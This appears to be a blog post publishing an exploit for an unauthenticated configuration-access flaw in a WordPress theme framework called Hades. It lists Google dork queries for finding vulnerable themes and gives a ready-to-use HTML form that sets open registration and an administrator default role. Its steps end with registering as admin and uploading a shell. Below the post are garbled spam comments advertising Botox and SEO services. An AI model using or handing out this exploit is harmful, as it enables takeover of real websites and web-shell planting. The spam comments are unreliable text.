WordPress Hades framework suffers from Unauthenticated Configuration Access.
the vulnerability allow the attacker to change the default user type to administrator,
then allows anyone to register. This allows the attacker to register and become
an administrator.
There's Many WordPress Themes/Plugins Vulnerable...
inurl:/wp-content/themes/appius/
inurl:/wp-content/themes/Consultant/
inurl:/wp-content/themes/appius1/
inurl:/wp-content/themes/archin/
inurl:/wp-content/themes/averin/
inurl:/wp-content/themes/dagda/
inurl:/wp-content/themes/echea/
inurl:/wp-content/themes/felici/
inurl:/wp-content/themes/kmp/
inurl:/wp-content/themes/kmp2/
inurl:/wp-content/themes/liberal/
inurl:/wp-content/themes/liberal-media-bias/
inurl:/wp-content/themes/linguini/
inurl:/wp-content/themes/livewire/
inurl:/wp-content/themes/majestics/
inurl:/wp-content/themes/mathis/
inurl:/wp-content/themes/mazine/
inurl:/wp-content/themes/Orchestra/
inurl:/wp-content/themes/shopsum/
inurl:/wp-content/themes/shotzz/
inurl:/wp-content/themes/test/
inurl:/wp-content/themes/Viteeo/
inurl:/wp-content/themes/vithy/
inurl:/wp-content/themes/yvora/
inurl:/wp-content/themes/sodales/
inurl:/hades_framework/
Exploit :
<form action="http://127.0.0.1/wp-content/themes/{%THEME%}/hades_framework/option_panel/ajax.php" method="POST">
<input name="values[0][name]" value="users_can_register">
<input name="values[0][value]" value="1">
<input name="values[1][name]" value="admin_email">
<input name="values[1][value]" value="{%YOUR_EMAIL}">
<input name="values[2][name]" value="default_role">
<input name="values[2][value]" value="administrator">
<input name="action" value="save">
<input type="submit" value="Submit">
</form>
*Save In Html File*
1. Change {%THEME%} with the vulnerable theme, {%YOUR_EMAIL} with your email address.
2. If That Site Vuln , It Will Show Success Text
3. go to http://site.com/wp-login.php?action=register, you will see the registration form.
4. choose your username & email address and register.
5. go to your email, you will find your password.
6. then login & and upload your shell
I'm going away from this idea myself. With Skin Care, it is all about the quantity of Botox treatment and not the quantity. It is what I like to do with Botox treatment. nutra platform I understand Botox treatment gets recognized. How can characters observe budget Botox treatment coupons? It has mushroomed in
ReplyDeleterecent days. I've never seen Anti Aging before that time.
https://www.nutraplatform.com/
We may need to understand that eligibility is limited. Assuredly, depending on how we look at that, there might be. You should locate a couple of more Skin Care. virilaxyn rx The factor all these typical citizens share is a genuine love for that target. Without considering that, Duh! This is like we've begun a number of Nutra platform clones although I will begin by talking about this on Skin Care in a future article. I don't know but it seemed to do it for me.
ReplyDeletehttps://www.nutraplatform.com/virilaxyn-rx/
Read my lips! Where can enthusiasts chance upon peerless Anti Aging services? Those who adapt to Botox treatment will succeed. Those who don't won't. By all means, "You have to stop and smell the roses.
ReplyDeletehttps://www.nutraplatform.com/
ReplyDeleteHello,
we provide affordable and result-oriented SEO services, please give a chance to serve you.
Thanks
Admin: E07.net
Cool
ReplyDelete